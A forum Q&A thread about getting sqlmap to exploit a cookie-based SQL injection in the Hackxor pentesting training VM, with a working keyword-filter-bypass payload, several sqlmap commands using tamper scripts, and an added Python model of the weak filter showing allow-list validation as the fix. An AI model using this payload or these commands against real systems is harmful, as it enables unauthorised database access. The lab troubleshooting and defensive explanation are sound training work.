
Right now I'm tinkering with the Hackxor VM (a pentesting training environment) and I'm trying to use sqlmap to exploit a vulnerability which I can exploit manually.

The vulnerability is in the cookie header's 'userid' parameter. The application implements some SQLi filter to block spaces and some SQL keywords, so you have to convolute the payload a bit.

I can successfully exploit the vulnerability by injecting the following payload into the mentioned 'userid' parameter with an HTTP proxy:

71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users

Then I tried to replicate the injection with sqlmap, without success, using the following command:

sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" -p "userid" --level 5 --tamper "nonrecursivereplacement.py,space2comment.py" --sql-query="71934 UNION SELECT * from users"

I expected sqlmap to inject only the given query and return a successful exploit, but sqlmap tries a lot of queries and in the end reports that the 'userid' parameter is not vulnerable.

What am I doing wrong?

Hidden
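Added example (not from the question, the Hackxor VM or sqlmap): a small Python model of the kind of single-pass filter described above, showing why the nested-keyword payload from the question survives it while a plain UNION SELECT does not, and the allow-list check a numeric 'userid' cookie should get instead. The filter logic is an assumption about the application's behaviour, not its real code.

```python
import re

# Constructed model of the filter the question describes: spaces and a few
# SQL keywords are removed exactly once (non-recursively). This is an
# assumption about the application's behaviour, not the Hackxor code.
BLOCKED_KEYWORDS = ("UNION", "SELECT")

# Payload quoted in the question.
PAYLOAD = "71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users"


def weak_filter(value: str) -> str:
    """Strip spaces and blocked keywords in a single pass (non-recursive)."""
    cleaned = value.replace(" ", "")
    for kw in BLOCKED_KEYWORDS:
        # One pass only: removing 'UNION' from 'unUNIONion' leaves 'union'.
        cleaned = re.sub(re.escape(kw), "", cleaned, flags=re.IGNORECASE)
    return cleaned


def sql_view(fragment: str) -> str:
    """What the SQL parser effectively sees: inline comments act as whitespace."""
    return re.sub(r"/\*.*?\*/", " ", fragment)


def weak_filter_is_bypassed(value: str) -> bool:
    """True if a UNION SELECT survives the filter as seen by the SQL parser."""
    parsed = sql_view(weak_filter(value)).upper()
    return re.search(r"\bUNION\s+SELECT\b", parsed) is not None


def strict_userid(value: str) -> int:
    """Allow-list validation: 'userid' must be a short decimal integer."""
    if not re.fullmatch(r"\d{1,10}", value):
        raise ValueError("invalid userid")
    return int(value)


if __name__ == "__main__":
    print("plain UNION SELECT blocked:", not weak_filter_is_bypassed("71934 UNION SELECT * from users"))
    print("nested-keyword payload passes weak filter:", weak_filter_is_bypassed(PAYLOAD))
    print("strict validation accepts 71934:", strict_userid("71934"))
    try:
        strict_userid(PAYLOAD)
    except ValueError as exc:
        print("strict validation rejects payload:", exc)
```

Validating the cookie against what it must be (an integer) and binding it as a query parameter removes the problem; stripping keywords once does not.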

2 Answers


I actually ran into a similar issue. I thought my syntax was correct and I still don't know where I went wrong, but I was able to use the -r flag and feed sqlmap a captured HTTP header as a parameter. Once I did this, sqlmap identified the field as vulnerable (which I already knew it was) and acted as I initially thought it would.

SQLmap POST parameter 'txtLoginID' is not injectable

Hope this helps!

Grady Negronida

It needs to work this way:

sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" --level 5 --risk 3 -p "userid" --tamper=nonrecursivereplacement,space2comment --sql-query="71934 UNION SELECT * from users"
ugur.ercan